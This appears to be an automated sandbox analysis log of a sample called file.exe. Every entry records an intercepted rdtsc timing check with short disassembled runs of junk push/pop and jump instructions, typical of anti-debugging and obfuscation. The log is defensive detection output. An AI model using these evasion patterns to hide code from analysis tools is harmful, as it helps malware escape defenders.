                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB42AA second address: AB42C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F0B44EA8C7Ch 0x0000000c jp 00007F0B44EA8C76h 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2AFB second address: AB2B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2B10 second address: AB2B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jl 00007F0B44EA8C86h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2B21 second address: AB2B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7B31 second address: AB7B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F0B44EA8C78h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A801D2 second address: A678E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jns 00007F0B44BD79AAh 0x0000000f nop 0x00000010 add dword ptr [ebp+122D1DDBh], edi 0x00000016 call dword ptr [ebp+122D36C3h] 0x0000001c pushad 0x0000001d jbe 00007F0B44BD79AEh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80602 second address: A80607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80607 second address: A8060E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A807E4 second address: A807E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A807E8 second address: A80809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80809 second address: A8080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8080E second address: A808A1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B44BD79A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f jp 00007F0B44BD79B7h 0x00000015 pop esi 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 jnp 00007F0B44BD79BEh 0x0000001f jmp 00007F0B44BD79B8h 0x00000024 jmp 00007F0B44BD79B4h 0x00000029 popad 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e jno 00007F0B44BD79B2h 0x00000034 pop eax 0x00000035 or dx, E360h 0x0000003a push C5E9A87Ah 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F0B44BD79B1h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80965 second address: A80981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C88h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80B68 second address: A80BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push ebx 0x0000000e jns 00007F0B44BD79A8h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F0B44BD79AAh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jno 00007F0B44BD79B0h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80BA8 second address: A80BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80BB2 second address: A80BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80E1B second address: A80E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0B44EA8C76h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80E26 second address: A80E4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0B44BD79ADh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+122D230Ah], ebx 0x00000014 push 00000004h 0x00000016 nop 0x00000017 pushad 0x00000018 jc 00007F0B44BD79ACh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80E4E second address: A80E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C80h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80E69 second address: A80E73 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80E73 second address: A80E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80E77 second address: A80E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8171D second address: A81728 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0B44EA8C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81728 second address: A68491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov cx, dx 0x0000000b call dword ptr [ebp+122D297Dh] 0x00000011 jc 00007F0B44BD79E2h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F0B44BD79A6h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB7E29 second address: AB7E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB821A second address: AB8220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8220 second address: AB8241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C89h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB83C5 second address: AB83DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B44BD79B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB857C second address: AB8580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8580 second address: AB8584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8584 second address: AB85A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C81h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F0B44EA8C76h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB85A5 second address: AB85B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B44BD79A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB85B1 second address: AB85B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB8711 second address: AB8751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44BD79B0h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b jbe 00007F0B44BD79D2h 0x00000011 jmp 00007F0B44BD79AEh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F0B44BD79B4h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABC1D1 second address: ABC211 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B44EA8C87h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F0B44EA8C84h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F0B44EA8C7Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A45155 second address: A4515B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4515B second address: A4516C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0B44EA8C76h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABFA01 second address: ABFA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC41B5 second address: AC41BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC41BA second address: AC41D5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007F0B44BD79A6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007F0B44BD79AAh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4817 second address: AC481B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC481B second address: AC481F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC481F second address: AC482B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC482B second address: AC4873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B4h 0x00000007 jl 00007F0B44BD79A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0B44BD79AEh 0x00000015 jmp 00007F0B44BD79ABh 0x0000001a jp 00007F0B44BD79A6h 0x00000020 popad 0x00000021 pushad 0x00000022 ja 00007F0B44BD79A6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC8099 second address: AC809F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7B66 second address: AC7B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7B6A second address: AC7B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC7D65 second address: AC7D8B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pushad 0x0000000c jg 00007F0B44BD79B7h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A485DA second address: A485FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0B44EA8C81h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A485FE second address: A4860A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0B44BD79A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4860A second address: A48614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48614 second address: A48620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48620 second address: A4862C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAAD4 second address: ACAAF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f ja 00007F0B44BD79ACh 0x00000015 jl 00007F0B44BD79A6h 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAC20 second address: ACAC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAC24 second address: ACAC38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAC38 second address: ACAC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAC42 second address: ACAC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAC48 second address: ACAC59 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0B44EA8C76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAE2C second address: ACAE30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACAE30 second address: ACAE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0B44EA8C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0B44EA8C82h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD1905 second address: AD190F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD190F second address: AD1928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C82h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD02A5 second address: AD02BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79AEh 0x00000007 jno 00007F0B44BD79A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD02BD second address: AD02C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0AEB second address: AD0AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD0AF3 second address: AD0AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD603F second address: AD606E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0B44BD79A6h 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0B44BD79B9h 0x00000013 jg 00007F0B44BD79A8h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD606E second address: AD608A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C86h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD608A second address: AD608E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8D48 second address: AD8D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8D4C second address: AD8D5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F0B44BD79A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8D5C second address: AD8D83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C84h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jne 00007F0B44EA8C76h 0x00000012 pop edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD9094 second address: AD909F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD909F second address: AD90A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEB1B second address: ADEB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007F0B44BD79AAh 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEB2C second address: ADEB33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEB33 second address: ADEB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEB39 second address: ADEB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F0B44EA8CA3h 0x0000000d jno 00007F0B44EA8C7Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADECE5 second address: ADECE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEE55 second address: ADEE5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADEE5F second address: ADEE77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF14E second address: ADF152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF437 second address: ADF43D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF43D second address: ADF441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF441 second address: ADF46F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0B44BD79B0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0B44BD79AEh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF46F second address: ADF48C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0B44EA8C87h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF48C second address: ADF492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADF7B8 second address: ADF7CC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B44EA8C76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADFA60 second address: ADFA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ADFA66 second address: ADFA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0B44EA8C7Ah 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE74F0 second address: AE74F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEB278 second address: AEB289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0B44EA8C76h 0x00000009 jo 00007F0B44EA8C76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA91A second address: AEA91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEA91F second address: AEA924 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
